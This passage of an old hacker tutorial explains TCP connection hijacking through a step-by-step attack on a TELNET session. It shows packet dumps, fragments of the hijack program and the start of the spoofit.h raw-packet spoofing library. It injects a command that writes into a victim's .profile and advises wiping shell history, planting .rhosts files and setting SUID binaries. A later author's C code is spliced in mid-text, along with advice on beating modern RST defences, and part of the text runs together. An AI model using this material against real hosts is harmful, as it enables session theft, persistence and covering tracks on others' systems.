other way around. Those 2 attacks could both impersonate host A and B, thus
giving us 4 times more chance of a successful kill.

I'll leave further experimenting up to you (use your imagination to handle
different situations).
4.4 Connection Hijacking
------------------------

Setup:
        host A <------X------------------------->host B   A,B have a TCP
                      |                                    connection running
        host S <------/                                    (TELNET)
                                                           A,S on same subnet

Concept:
  (suppose a TELNET from A (client) to B (server))

  TCP separates good and bogus packets by their SEQ/ACK numbers, i.e. B
  trusts the packets from A because of its correct SEQ/ACK numbers. So if
  there was a way to mess up A's SEQ/ACK, B would stop believing A's real
  packets. We could then impersonate A, but using correct SEQ/ACK numbers
  (that is, numbers correct for B). We would now have taken over the
  connection (host A is confused, B thinks nothing's wrong (almost correct,
  see 'actual attack'), and S sends 'correct' data to B). This is called
  'Hijacking' a connection. (generally hijacking a TELNET session, but the
  same could be done with FTP, RLOGIN, etc...)

  How could we mess up A's SEQ/ACK numbers? Well, by simply inserting a data
  packet into the stream at the right time (S as A->B), the server B would
  accept this data, and update ACK numbers; A would continue to send its old
  SEQ numbers, as it's unaware of our spoofed data.

Use:
  I already hear you wiseguys yelling: "Hey dude, why hijack a connection if
  you can sniff those packets anyway??" Well, anybody heard of One Time
  Passwords, Secure Key?? Case closed....

  (S/Key: server challenges client, client and server calculate a code from
  the challenge and password, and compare that code. The password itself is
  never sent on the cable, so you can't sniff sh!t).

  (OTP: server has a list of passwords; once one is used, it is destroyed, so
  sniffing gets you a password that has 'just' expired ;)

  (ALL types of identification that happen at connection (encrypted or not,
  trusted or not), and don't use encrypted data transfer, are vulnerable to
  'hijacking'.)

An actual attack:
  (These are real sniffed packets, although IP numbers of hosts were changed)
  (suppose a TELNET from A (client) to B (server))

  host A : 166.66.66.1
  host B : 111.11.11.11
  (S on same subnet as A)

1) connection running... we look with sniffit, and see he's busy in a shell;
   we start 'hijack' on host S as 'hijack 166.66.66.1 2035 111.11.11.11'.
   A packet containing data from (A->B) is detected... hijack takes action...
   (A->B)

   TCP Packet ID (from_IP.port-to_IP.port): 166.66.66.1.1040-111.11.11.11.23
     SEQ (hex): 5C8223EA   ACK (hex): C34A67F6
     FLAGS: -AP---   Window: 7C00

   Packet ID (from_IP.port-to_IP.port): 166.66.66.1.1040-111.11.11.11.23
     45 E  00 .  00 .  29 )  CA .  F3 .  40 @  00 .  40 @  06 .
     C5 .  0E .  9D .  C1 .  45 E  3F ?  9D .  C1 .  2A *  0B .
     04 .  10 .  00 .  17 .  5C \  82 .  23 #  EA .  C3 .  4A J
     67 g  F6 .  50 P  18 .  7C |  00 .  6D m  29 )  00 .  00 .
     6C l
     ~~~~

2) host B (server) echoes that databyte (typing 'l' in a bash shell!!!) (you
   gotta know what you are doing) (B->A)

   TCP Packet ID (from_IP.port-to_IP.port): 111.11.11.11.23-166.66.66.1.1040
     SEQ (hex): C34A67F6   ACK (hex): 5C8223EB
     FLAGS: -AP---   Window: 2238

   Packet ID (from_IP.port-to_IP.port): 111.11.11.11.23-166.66.66.1.1040
     45 E  00 .  00 .  29 )  B5 .  BD .  40 @  00 .  FC .  06 .
     1E .  44 D  9D .  C1 .  2A *  0B .  9D .  C1 .  45 E  3F ?
     00 .  17 .  04 .  10 .  C3 .  4A J  67 g  F6 .  5C \  82 .
     23 #  EB .  50 P  18 .  22 "  38 8  C6 .  F0 .  00 .  00 .
     6C l
     ~~~~

3) A simple ACK from host A to B responding to that echo. Because we know
   this can come, and we know a simple ACK doesn't contain data, we don't
   need this for SEQ/ACK calculation.

   TCP Packet ID (from_IP.port-to_IP.port): 166.66.66.1.1040-111.11.11.11.23
     SEQ (hex): 5C8223EB   ACK (hex): C34A67F7
     FLAGS: -A----   Window: 7C00
   (data removed because irrelevant)

4) Now we impersonate further data (following packet 1). (S as A -> B)
   We calculate SEQ/ACK out of packet 1, NOT out of the 'echo' from B,
   because we have to be as fast as possible, and packet 2 could be slow. We
   send some backspaces and some enters, to clean up the command line. We
   will probably still get some error message back from the shell. But we
   handle that too! (see sourcecode)

   TCP Packet ID (from_IP.port-to_IP.port): 166.66.66.1.1040-111.11.11.11.23
     SEQ (hex): 5C8223EB   ACK (hex): C34A67F6
     FLAGS: -AP---   Window: 7C00

   Packet ID (from_IP.port-to_IP.port): 166.66.66.1.1040-111.11.11.11.23
     45 E  00 .  00 .  32 2  31 1  01 .  00 .  00 .  45 E  06 .
     99 .  F8 .  9D .  C1 .  45 E  3F ?  9D .  C1 .  2A *  0B .
     04 .  10 .  00 .  17 .  5C \  82 .  23 #  EB .  C3 .  4A J
     67 g  F6 .  50 P  18 .  7C |  00 .  AE .  F5 .  00 .  00 .
     08 .  08 .  08 .  08 .  08 .  08 .  08 .  08 .  0A .  0A .

5) This is the echo of our spoofed data. Look at ACK. (B->A)
   5C8223F5 = 5C8223EB + 0A (this is how we detect that the spoof was a
   success)
   NOTE that at this point the connection is ours, and A's SEQ/ACK numbers
   are completely f#cked up according to B.

   TCP Packet ID (from_IP.port-to_IP.port): 111.11.11.11.23-166.66.66.1.1040
     SEQ (hex): C34A67F7   ACK (hex): 5C8223F5
     FLAGS: -AP---   Window: 2238

   Packet ID (from_IP.port-to_IP.port): 111.11.11.11.23-166.66.66.1.1040
     45 E  00 .  00 .  3C <  B5 .  BE .  40 @  00 .  FC .  06 .
     1E .  30 0  9D .  C1 .  2A *  0B .  9D .  C1 .  45 E  3F ?
     00 .  17 .  04 .  10 .  C3 .  4A J  67 g  F7 .  5C \  82 .
     23 #  F5 .  50 P  18 .  22 "  38 8  26 &  7C |  00 .  00 .
     5E ^  48 H  5E ^  48 H  5E ^  48 H  5E ^  48 H  5E ^  48 H
     5E ^  48 H  5E ^  48 H  5E ^  48 H  0D .  0A .  0D .  0A .

6) Hijack will now try to get on track of SEQ/ACK numbers again, to send the
   data we want to be executed.
   NOTE each time a packet 'out of numbering' arrives the host should answer
   with correct SEQ/ACK; this provides us with the certainty that a lot of
   packets are going to be sent with correct (and not changing) SEQ/ACK nrs.
   (this is where the mechanism of getting our numbers back straight is
   based upon)
   NOTE it's at this point the real TELNET client's session hangs; most
   people ignore this and re-login after a few secs, accepting the accident
   as Murphy's law. (Well it *can* happen without any spoofing involved)

   TCP Packet ID (from_IP.port-to_IP.port): 166.66.66.1.1040-111.11.11.11.23
     SEQ (hex): 5C8223EB   ACK (hex): C34A67F7
     FLAGS: -AP---   Window: 7C00
   (data removed because irrelevant)

   TCP Packet ID (from_IP.port-to_IP.port): 111.11.11.11.23-166.66.66.1.1040
     SEQ (hex): C34A680B   ACK (hex): 5C8223F5
     FLAGS: -A----   Window: 2238
   (data removed because irrelevant)

   TCP Packet ID (from_IP.port-to_IP.port): 166.66.66.1.1040-157.193.42.11.23
     SEQ (hex): 5C8223EB   ACK (hex): C34A67F7
     FLAGS: -AP---   Window: 7C00
   (data removed because irrelevant)

   TCP Packet ID (from_IP.port-to_IP.port): 111.11.11.11.23-166.66.66.1.1040
     SEQ (hex): C34A680B   ACK (hex): 5C8223F5
     FLAGS: -A----   Window: 2238
   (data removed because irrelevant)

7) We are back on track (or at least hijack is, because this is going very
   fast). And we fire off our faked bash command.

   echo "echo HACKED" >> $HOME/.profile

   TCP Packet ID (from_IP.port-to_IP.port): 166.66.66.1.1040-111.11.11.11.23
     SEQ (hex): 5C8223F5   ACK (hex): C34A680B
     FLAGS: -AP---   Window: 7C00

   Packet ID (from_IP.port-to_IP.port): 166.66.66.1-111.11.11.11.23
     45 E  00 .  00 .  4D M  31 1  01 .  00 .  00 .  45 E  06 .
     99 .  DD .  9D .  C1 .  45 E  3F ?  9D .  C1 .  2A *  0B .
     04 .  10 .  00 .  17 .  5C \  82 .  23 #  F5 .  C3 .  4A J
     68 h  0B .  50 P  18 .  7C |  00 .  5A Z  B6 .  00 .  00 .
     65 e  63 c  68 h  6F o  20    22 "  65 e  63 c  68 h  6F o
     20    48 H  41 A  43 C  4B K  45 E  44 D  22 "  20    3E >
     3E >  24 $  48 H  4F O  4D M  45 E  2F /  2E .  70 p  72 r
     6F o  66 f  69 i  6C l  65 e  0A .  00 .

8) now we wait for this data to be confirmed. ACK = 5C8223F5 + 025 (=37
   bytes)

   TCP Packet ID (from_IP.port-to_IP.port): 111.11.11.11.23-166.66.66.1.1040
     SEQ (hex): C34A680B   ACK (hex): 5C82241A
     FLAGS: -AP---   Window: 2238

   Packet ID (from_IP.port-to_IP.port): 157.193.42.11.23-157.193.69.63.1040
   (data removed because irrelevant)

9) The connection runs on. Now you can execute more commands (just stay on
   track of SEQ/ACK), and even finish the connection (with the same mechanism
   as sniper, or with sniper itself... here FIN is recommended).

NOTE: here it is important to be in a shell. But if you have been watching
      someone, and you notice he's always directly going to 'pine' and you
      can't get in between on time. NO PROBS.... just make a cleanup string
      that cleans up 'pine' and puts you back in the shell. (some control
      chars, hotkeys, whatever....)

NOTE: if you clean up the .sh_history or .bash_history (whatever) this attack
      is one of the nicest there is. Another advantage above sniffing.

NOTE: No one says you have to make a .rhosts file (rlogin and family might be
      disabled); you can change permissions, put stuff SUID, put it public,
      install stuff, mail, etc..

Discussion of the program (numbers correspond with those of 'An Actual
Attack'):

1) wait_packet(fd_receive,&attack_info,CLIENT, CLIENT_P, SERVER, 23,ACK|PSH,0);

   Waiting for actual data (PSH is always used for packets containing data in
   interactive services like TELNET)

2) N/A

3) N/A

4) sp_seq=attack_info.seq+attack_info.datalen;
   sp_ack=attack_info.ack;
   transmit_TCP(fd_send, to_data,0,0,sizeof(to_data),CLIENT, CLIENT_P,
                SERVER, 23,sp_seq,sp_ack,ACK|PSH);

   We recalculate the sequence number (using SEQ and datalength of packet 1)
   and we send a spoofed packet with ACK and PSH flag, containing the cleanup
   data in to_data.

5) while(count<5)
     {
     wait_packet(fd_receive, &attack_info,SERVER,23,CLIENT,CLIENT_P,ACK,0);
     if(attack_info.ack==sp_seq+sizeof(to_data))
       count=PERSONAL_TOUCH;
     else count++;
     };

   We wait for a confirmation that our spoofed sequence is accepted. We
   expect a packet with an ACK set (PSH or not). It should come within 5
   packets; we use this limit, because we should be able to handle some
   previous ACK packets!
   NOTE we don't check SEQ nrs, because we have no clue of what they are
   going to be (data might have been sent our way, or not).
6) while(count<10) { old_seq=serv_seq; old_ack=serv_ack; wait_packet(fd_receive,&attack_info,SERVER, 23, CLIENT, CLIENT_P, ACK,0); if(attack_info.datalen==0) { serv_seq=attack_info.seq+attack_info.datalen; serv_ack=attack_info.ack; if( (old_seq==serv_seq)&&(serv_ack==old_ack) ) count=PERSONAL_TOUCH; else count++; } }; To get back on track, we try to receive 2 ACK packets without data with the same SEQ/ACK. We know enough packets will be send as a response to incorrect packets from the confused host A. This is how we get back on track. NOTE In a case where A completely gave up, simple spoof a packet with incorrect SEQ/ACK to get the correct numbers back. 7) transmit_TCP(fd_send, evil_data,0,0,sizeof(evil_data),CLIENT,CLIENT_P, SERVER,23,serv_ack,serv_seq,ACK|PSH); Pretty clear.... 8) while(count<5) { wait_packet(fd_receive,&attack_info,SERVER,23,CLIENT,CLIENT_P,ACK,0); if(attack_info.ack==serv_ack+sizeof(evil_data)) count=PERSONAL_TOUCH; else count++; }; and again waiting for confirmation. NOTE after the above attack, hijack had produced the following output: Starting Hijacking demo - Brecht Claerhout 1996 ----------------------------------------------- Takeover phase 1: Stealing connection. Sending Spoofed clean-up data... Waiting for spoof to be confirmed... Phase 1 ended. Takeover phase 2: Getting on track with SEQ/ACK's again Server SEQ: C34A680B (hex) ACK: 5C8223F5 (hex) Phase 2 ended. Takeover phase 3: Sending MY data. Sending evil data. Waiting for evil data to be confirmed... Phase 3 ended. 4.5 Other --------- This list is far from complete, I'm sure you can think of other nice things to do with this information, think, experiment and code! 5. 
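The arithmetic of steps 4 to 8, and the checksums spoofit.h has to get right before the server accepts the step-7 packet at all, as an added worked example. This is my code, not Dr_Sp00f's: it rebuilds the step-7 datagram from the hex dump above, recomputes the IP and TCP checksums the way sp_fix_IP_packet()/sp_fix_TCP_packet() do (RFC 1071 one's-complement sum, TCP over the pseudo-header), and applies the SEQ/ACK rules of hijack.c to the numbers in the dumps. KEYSTROKE is an assumption (the step-1 client packet is not reproduced in this issue, so a one-byte ACK|PSH segment is constructed); the 157.193.x.x address bytes are the ones in the dump; in_window() is the RFC 793 acceptance rule, not something from the page's code.

```c
#include <stdint.h>
#include <stddef.h>
#include <string.h>
#include <stdio.h>

/* The step-7 datagram, byte for byte from the hex dump in 'An Actual Attack':
   20 bytes IP, 20 bytes TCP, 37 bytes data. Constructed from the page, not
   captured by this program. */
static const uint8_t STEP7_PKT[77] = {
    0x45,0x00,0x00,0x4D,0x31,0x01,0x00,0x00,0x45,0x06,0x99,0xDD,   /* IP: len 77, ID 12545, TTL 69, csum */
    0x9D,0xC1,0x45,0x3F, 0x9D,0xC1,0x2A,0x0B,                      /* source and destination address */
    0x04,0x10,0x00,0x17, 0x5C,0x82,0x23,0xF5, 0xC3,0x4A,0x68,0x0B, /* 1040 -> 23, SEQ, ACK */
    0x50,0x18,0x7C,0x00, 0x5A,0xB6,0x00,0x00,                      /* hlen 5, ACK|PSH, window, csum, urg */
    'e','c','h','o',' ','"','e','c','h','o',' ','H','A','C','K','E','D','"',
    ' ','>','>','$','H','O','M','E','/','.','p','r','o','f','i','l','e','\n',0x00
};

/* RFC 1071 one's-complement sum over big-endian 16-bit words; an odd trailing
   byte is padded with zero, as in_cksum() in spoofit.h does. */
static uint32_t ones_sum(const uint8_t *p, size_t len, uint32_t sum)
{
    for (; len > 1; p += 2, len -= 2) sum += (uint32_t)p[0] << 8 | p[1];
    if (len) sum += (uint32_t)p[0] << 8;
    return sum;
}

static uint16_t fold(uint32_t sum)
{
    while (sum >> 16) sum = (sum & 0xFFFF) + (sum >> 16);
    return (uint16_t)~sum;
}

/* IP header checksum: the header only, with its checksum field taken as zero. */
uint16_t ip_checksum(const uint8_t *ip)
{
    size_t ihl = (size_t)(ip[0] & 0x0F) * 4;
    uint32_t s = ones_sum(ip, 10, 0);                  /* bytes 0..9 */
    return fold(ones_sum(ip + 12, ihl - 12, s));       /* bytes 12.., checksum skipped */
}

/* TCP checksum: pseudo-header (src, dst, zero, proto, TCP length) + TCP header
   + data, checksum field taken as zero. This is the sp_pseudo_ip_construct
   buffer that sp_fix_TCP_packet() assembles before calling in_cksum(). */
uint16_t tcp_checksum(const uint8_t *ip)
{
    size_t ihl = (size_t)(ip[0] & 0x0F) * 4;
    size_t tcp_len = (((size_t)ip[2] << 8) | ip[3]) - ihl;
    const uint8_t *tcp = ip + ihl;
    uint8_t pseudo[12];
    memcpy(pseudo, ip + 12, 8);                        /* source, destination */
    pseudo[8] = 0; pseudo[9] = ip[9];                  /* zero byte, protocol */
    pseudo[10] = (uint8_t)(tcp_len >> 8); pseudo[11] = (uint8_t)tcp_len;
    uint32_t s = ones_sum(pseudo, 12, 0);
    s = ones_sum(tcp, 16, s);                          /* ports, SEQ, ACK, offset/flags, window */
    return fold(ones_sum(tcp + 18, tcp_len - 18, s));  /* urgent pointer + data, checksum skipped */
}

/* What wait_packet() hands back for one segment (sp_wait_packet in spoofit.h). */
struct seg { uint32_t seq, ack; uint16_t flags; int datalen; };

/* Segments with the numbers from the dumps above. KEYSTROKE is constructed:
   the step-1 client packet is not shown on the page, so assume one typed byte
   with ACK|PSH that leaves the client's next SEQ at 5C8223EB. */
const struct seg KEYSTROKE = { 0x5C8223EAu, 0xC34A67F7u, 0x18, 1 };  /* constructed, client -> server */
const struct seg STORM_ACK = { 0xC34A680Bu, 0x5C8223F5u, 0x10, 0 };  /* step 6, server -> client */
const struct seg STEP8_ACK = { 0xC34A680Bu, 0x5C82241Au, 0x18, 0 };  /* step 8, server -> client; its data
                                                                        length is not shown and not needed */

/* Step 4: the spoofed segment continues the client's byte stream, so its SEQ
   is the server's RCV.NXT and it ACKs whatever the client last ACKed. */
uint32_t spoof_seq(const struct seg *last_client) { return last_client->seq + (uint32_t)last_client->datalen; }
uint32_t spoof_ack(const struct seg *last_client) { return last_client->ack; }

/* Steps 5 and 8: the server has taken our bytes when its ACK == our SEQ + length. */
int confirmed(const struct seg *server, uint32_t sp_seq, size_t injected)
{
    return server->ack == sp_seq + (uint32_t)injected;
}

/* Step 6: back on track once two consecutive data-less server segments repeat
   the same SEQ/ACK; the desynchronised client provokes them (the ACK storm). */
int resynced(const struct seg *prev, const struct seg *cur)
{
    return prev->datalen == 0 && cur->datalen == 0 &&
           prev->seq == cur->seq && prev->ack == cur->ack;
}

/* RFC 793 acceptance test for a data-less segment (RST, FIN, our clean-up
   probe): RCV.NXT <= SEG.SEQ < RCV.NXT + RCV.WND, modulo 2^32 so it is right
   across sequence-number wrap. A host's RCV.NXT is simply the ACK number it
   last sent, which is why sniper-rst uses sp_seq = pinfo.ack. */
int in_window(uint32_t rcv_nxt, uint16_t rcv_wnd, uint32_t seg_seq)
{
    return (uint32_t)(seg_seq - rcv_nxt) < rcv_wnd;
}

int main(void)
{
    uint32_t sp_seq = spoof_seq(&KEYSTROKE), sp_ack = spoof_ack(&KEYSTROKE);
    printf("clean-up spoof: SEQ %08X ACK %08X, confirmed by step-6 ACK: %d\n",
           (unsigned)sp_seq, (unsigned)sp_ack, confirmed(&STORM_ACK, sp_seq, 10)); /* 10 = sizeof(to_data) */
    printf("resynced on repeated ACKs: %d; RST at RCV.NXT: %d, RST 10 bytes early: %d\n",
           resynced(&STORM_ACK, &STORM_ACK),
           in_window(0x5C8223F5u, 0x2238, 0x5C8223F5u), in_window(0x5C8223F5u, 0x2238, 0x5C8223EBu));
    printf("step-7 packet: IP csum %04X, TCP csum %04X (dump: 99DD / 5AB6); evil data confirmed: %d\n",
           (unsigned)ip_checksum(STEP7_PKT), (unsigned)tcp_checksum(STEP7_PKT),
           confirmed(&STEP8_ACK, 0x5C8223F5u, 37));
    return 0;
}
```

Save it under any name (say hijack_check.c, a name of my choosing), build with gcc and run it as an ordinary user: it opens no socket and sends nothing. Both checksums come out as the dump shows them (99DD and 5AB6), so the dump is a genuine packet from this library. One caveat on the window test for today's hosts: stacks that implement RFC 5961 reset on a blind RST only when its SEQ equals RCV.NXT exactly and answer any other in-window RST with a challenge ACK, so sp_seq = pinfo.ack is the one value sniper-rst can still use and the sp_seq+j loop the source suggests buys nothing against them.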
5. The source code
------------------

---=[ spoofit.h ]=------------------------------------------------------------

/**************************************************************************/
/* Spoofit.h - Include file for easy creating of spoofed TCP packets      */
/*             Requires LINUX 1.3.x (or later) Kernel                     */
/*             (illustration for 'A short overview of IP spoofing')       */
/*             V.1 - Copyright 1996 - Brecht Claerhout                    */
/*                                                                        */
/* Purpose - Providing skilled people with an easy to use spoofing source */
/*           I used it to be able to write my tools fast and short.       */
/*           Mind you this is only illustrative and can be easily         */
/*           optimised.                                                   */
/*                                                                        */
/* Author  - Dr_Sp00f (Himself)                                           */
/*           Serious advice, comments, statements, greets, always welcome */
/*           flames, moronic 3l33t >/dev/null                             */
/*                                                                        */
/* Disclaimer - This file is for educational purposes only. I am in       */
/*              NO way responsible for what you do with this file,        */
/*              or any damage you or this file causes.                    */
/*                                                                        */
/* For whom - People with a little knowledge of TCP/IP, C source code     */
/*            and general UNIX. Otherwise, please keep your hands off,    */
/*            and catch up on those things first.                         */
/*                                                                        */
/* Limited to - Linux 1.3.X or higher.                                    */
/*              If you know a little about your OS, it shouldn't be too   */
/*              hard to port.                                             */
/*                                                                        */
/* Important note - You might have noticed I use non-standard packet      */
/*                  header structs. How come?? Because I started like     */
/*                  that on Sniffit because I wanted to do the            */
/*                  bit transforms myself.                                */
/*                  Well I got so damned used to them, I keep using them, */
/*                  they are not very different, and not hard to use, so  */
/*                  you'll easily use my structs without any problem;     */
/*                  this code and the examples show how to use them.      */
/*                  My apologies for this inconvenience.                  */
/*                                                                        */
/* None of this code can be used in commercial software. You are free to  */
/* use it in any other non-commercial software (modified or not) as long  */
/* as you give me the credits for it. You can spread this include file,   */
/* but keep it unmodified.                                                */
/*                                                                        */
/**************************************************************************/
/*                                                                        */
/* Easiest way to understand this library is to look at the use of it, in */
/* the example progs.                                                     */
/*                                                                        */
/**** Sending packets *****************************************************/
/*                                                                        */
/* int open_sending (void)                                                */
/*    Returns a filedescriptor to the sending socket.                     */
/*    close it with close (int filedesc)                                  */
/*                                                                        */
/* void transmit_TCP (int sp_fd, char *sp_data,                           */
/*                    int sp_ipoptlen, int sp_tcpoptlen, int sp_datalen,  */
/*                    char *sp_source, unsigned short sp_source_port,     */
/*                    char *sp_dest, unsigned short sp_dest_port,         */
/*                    unsigned long sp_seq, unsigned long sp_ack,         */
/*                    unsigned short sp_flags)                            */
/*    fire data away in a TCP packet                                      */
/*      sp_fd         : raw socket filedesc.                              */
/*      sp_data       : IP options (you should do the padding)            */
/*                      TCP options (you should do the padding)           */
/*                      data to be transmitted                            */
/*                      (NULL is nothing)                                 */
/*                      note that all is optional, and IP and TCP options */
/*                      are not often used.                               */
/*                      All data is put after each other in one buffer.   */
/*      sp_ipoptlen   : length of IP options (in bytes)                   */
/*      sp_tcpoptlen  : length of TCP options (in bytes)                  */
/*      sp_datalen    : amount of data to be transmitted (bytes)          */
/*      sp_source     : spoofed host that "sends packet"                  */
/*      sp_source_port: spoofed port that "sends packet"                  */
/*      sp_dest       : host that should receive packet                   */
/*      sp_dest_port  : port that should receive packet                   */
/*      sp_seq        : sequence number of packet                         */
/*      sp_ack        : ACK of packet                                     */
/*      sp_flags      : flags of packet (URG,ACK,PSH,RST,SYN,FIN)         */
/*                                                                        */
/* void transmit_UDP (int sp_fd, char *sp_data,                           */
/*                    int sp_ipoptlen, int sp_datalen,                    */
/*                    char *sp_source, unsigned short sp_source_port,     */
/*                    char *sp_dest, unsigned short sp_dest_port)         */
/*    fire data away in an UDP packet                                     */
/*      sp_fd         : raw socket filedesc.                              */
/*      sp_data       : IP options                                        */
/*                      data to be transmitted                            */
/*                      (NULL if none)                                    */
/*      sp_ipoptlen   : length of IP options (in bytes)                   */
/*      sp_datalen    : amount of data to be transmitted                  */
/*      sp_source     : spoofed host that "sends packet"                  */
/*      sp_source_port: spoofed port that "sends packet"                  */
/*      sp_dest       : host that should receive packet                   */
/*      sp_dest_port  : port that should receive packet                   */
/*                                                                        */
/**** Receiving packets ***************************************************/
/*                                                                        */
/* int open_receiving (char *rc_device, char mode)                        */
/*    Returns fdesc to a receiving socket                                 */
/*    (if mode: IO_HANDLE don't call this twice, global var               */
/*    rc_fd_abc123 is initialised)                                        */
/*      rc_device: the device to use e.g. "eth0", "ppp0"                  */
/*                 be sure to change DEV_PREFIX accordingly!              */
/*                 DEV_PREFIX is the length in bytes of the header that   */
/*                 comes with a SOCKET_PACKET due to the network device   */
/*      mode: 0: normal mode, blocking, (read will wait till packet       */
/*               comes, mind you, we are in PROMISC mode)                 */
/*            IO_NONBLOCK: non-blocking mode (read will not wait till a   */
/*               packet comes, useful for active polling)                 */
/*            IO_HANDLE installs the signal handler that updates SEQ,ACK,.*/
/*            (IO_HANDLE is not recommended to use, as it should be       */
/*            modified according to own use, and it works badly on heavy  */
/*            traffic continuous monitoring. I needed it once, but left   */
/*            it in to make you able to have a look at Signal handled IO, */
/*            personally I would have removed it, but some thought it     */
/*            doesn't do any harm anyway, so why remove... )              */
/*            (I'm not giving any more info on IO_HANDLE as it is not     */
/*            needed for the example programs, and interested people can  */
/*            easily figure the code out themselves.)                     */
/*            (Besides IO_HANDLE can only be called ONCE in a program,    */
/*            other modes multiple times)                                 */
/*                                                                        */
/* int get_packet (int rc_fd, char *buffer, int *TCP_UDP_start,           */
/*                 unsigned char *proto)                                  */
/*    This waits for a packet (mode default) and puts it in buffer or     */
/*    returns whether there is a pack or not (IO_NONBLOCK).               */
/*    It returns the packet length if there is one available, else 0      */
/*                                                                        */
/* int wait_packet(int wp_fd,struct sp_wait_packet *ret_values,           */
/*                 char *wp_source, unsigned short wp_source_port,        */
/*                 char *wp_dest, unsigned short wp_dest_port,            */
/*                 int wp_flags, int wait_time);                          */
/*      wp_fd: a receiving socket (default or IO_NONBLOCK)                */
/*      ret_values: pointer to a sp_wait_packet struct, that contains SEQ,*/
/*                  ACK, flags, datalen of that packet. For further packet*/
/*                  handling see the examples.                            */
/*                  struct sp_wait_packet {                               */
/*                     unsigned long seq,ack;                             */
/*                     unsigned short flags;                              */
/*                     int datalen;                                       */
/*                  };                                                    */
/*      wp_source, wp_source_port : sender of packet                      */
/*      wp_dest, wp_dest_port     : receiver of packet                    */
/*      wp_flags: flags that should be present in packet.. (a packet is   */
/*                accepted when ANY of them is set, and more may be set,  */
/*                so check ret_values->flags and datalen on return)       */
/*                note: if you don't care about flags, use 0              */
/*      wait_time: if not zero, this function will return -1 if no correct*/
/*                 packet has arrived within wait_time secs.              */
/*                 (only works on IO_NONBLOCK socket)                     */
/*                                                                        */
/* void set_filter (char *f_source, unsigned short f_source_port,         */
/*                  char *f_dest, unsigned short f_dest_port)             */
/*    (for use with IO_HANDLE)                                            */
/*    Start the program to watch all traffic from source/port to          */
/*    dest/port. This enables the updating of global data. Can            */
/*    be called multiple times.                                           */
/*                                                                        */
/* void close_receiving (void)                                            */
/*    When opened a IO_HANDLE mode receiving socket close it with         */
/*    this.                                                               */
/*                                                                        */
/**** Global DATA (IO_HANDLE mode) ****************************************/
/*                                                                        */
/* When accessing global data, copy the values to local vars and then use */
/* them. Reduce access time to a minimum.                                 */
/* Mind you use of this is very limited, if you are a novice on IO, just  */
/* ignore it, the other functions are good enough! If not, rewrite the    */
/* handler for your own use...                                            */
/*                                                                        */
/* sig_atomic_t SP_DATA_BUSY                                              */
/*    Put this on NON-ZERO when accessing global data. Incoming           */
/*    packets will be ignored then, data can not be overwritten.          */
/*                                                                        */
/* unsigned long int CUR_SEQ, CUR_ACK;                                    */
/*    Last recorded SEQ and ACK number of the filtered "stream".          */
/*    Before accessing this data set SP_DATA_BUSY non-zero,               */
/*    afterward set it back to zero.                                      */
/*                                                                        */
/* unsigned long int CUR_COUNT;                                           */
/*    increased every time other data is updated                          */
/*                                                                        */
/* unsigned int CUR_DATALEN;                                              */
/*    Length of data in last TCP packet                                   */
/*                                                                        */
/**************************************************************************/

#include <sys/socket.h>           /* includes, what would we do without them */
#include <sys/types.h>
#include <sys/ioctl.h>
#include <netdb.h>
#include <stdlib.h>
#include <unistd.h>
#include <stdio.h>
#include <errno.h>
#include <string.h>               /* memcpy/strcpy/strcmp, bzero/bcopy, isdigit,  */
#include <strings.h>              /* inet_addr, uint32_t: the original relied on  */
#include <ctype.h>                /* implicit declarations for these, which no    */
#include <stdint.h>               /* current compiler accepts                     */
#include <arpa/inet.h>
#include <netinet/in.h>
#include <netinet/ip.h>
#include <linux/if.h>
#include <signal.h>
#include <fcntl.h>

#undef DEBUG

#define IP_VERSION 4              /* keep y'r hands off... */
#define MTU 1500

#define IP_HEAD_BASE 20           /* using fixed lengths to send */
#define TCP_HEAD_BASE 20          /* no options etc... */
#define UDP_HEAD_BASE 8           /* Always fixed */

#define IO_HANDLE 1
#define IO_NONBLOCK 2

int DEV_PREFIX = 9999;
sig_atomic_t WAIT_PACKET_WAIT_TIME=0;

/**** IO_HANDLE ************************************************************/
int rc_fd_abc123;
sig_atomic_t RC_FILTSET=0;
char rc_filter_string[50];        /* x.x.x.x.p-y.y.y.y.g */
sig_atomic_t SP_DATA_BUSY=0;
unsigned long int CUR_SEQ=0, CUR_ACK=0, CUR_COUNT=0;
unsigned int CUR_DATALEN;
unsigned short CUR_FLAGS;
/***************************************************************************/

struct sp_wait_packet
{
  unsigned long seq,ack;
  unsigned short flags;
  int datalen;
};

/* Code from Sniffit - BTW my own program.... no copyright violation here */

#define URG 32                    /* TCP flags */
#define ACK 16
#define PSH 8
#define RST 4
#define SYN 2
#define FIN 1

struct PACKET_info
{
  int len, datalen;
  unsigned long int seq_nr, ACK_nr;
  u_char FLAGS;
};

/* On-the-wire 32-bit fields are uint32_t below. The original declared them  */
/* unsigned long int, which was 32 bits on the i386 kernels it targeted but  */
/* is 64 bits on x86-64 and would misalign every header.                     */
struct IP_header                  /* The IPheader (without options) */
{
  unsigned char verlen, type;
  unsigned short length, ID, flag_offset;
  unsigned char TTL, protocol;
  unsigned short checksum;
  uint32_t source, destination;
};

struct TCP_header                 /* The TCP header (without options) */
{
  unsigned short source, destination;
  uint32_t seq_nr, ACK_nr;
  unsigned short offset_flag, window, checksum, urgent;
};

struct UDP_header                 /* The UDP header */
{
  unsigned short source, destination;
  unsigned short length, checksum;
};

struct pseudo_IP_header           /* The pseudo IP header (checksum calc) */
{
  uint32_t source, destination;
  char zero_byte, protocol;
  unsigned short TCP_UDP_len;
};

/* data structure for argument passing */
struct sp_data_exchange
{
  int fd;                         /* Sh!t from transmit_TCP */
  char *data;
  int datalen;
  char *source;
  unsigned short source_port;
  char *dest;
  unsigned short dest_port;
  unsigned long seq, ack;
  unsigned short flags;
  char *buffer;                   /* work buffer */
  int IP_optlen;                  /* IP options length in bytes */
  int TCP_optlen;                 /* TCP options length in bytes */
};

/**************** all functions
*******************************************/

void transmit_TCP (int fd, char *sp_data,
                   int sp_ipoptlen, int sp_tcpoptlen, int sp_datalen,
                   char *sp_source, unsigned short sp_source_port,
                   char *sp_dest, unsigned short sp_dest_port,
                   unsigned long sp_seq, unsigned long sp_ack,
                   unsigned short sp_flags);
void transmit_UDP (int sp_fd, char *sp_data,
                   int ipoptlen, int sp_datalen,
                   char *sp_source, unsigned short sp_source_port,
                   char *sp_dest, unsigned short sp_dest_port);
int get_packet (int rc_fd, char *buffer, int *, unsigned char*);
int wait_packet(int,struct sp_wait_packet *,char *, unsigned short,char *,
                unsigned short, int, int);
static unsigned long sp_getaddrbyname(char *);
int open_sending (void);
int open_receiving (char *, char);
void close_receiving (void);
void sp_send_packet (struct sp_data_exchange *, unsigned char);
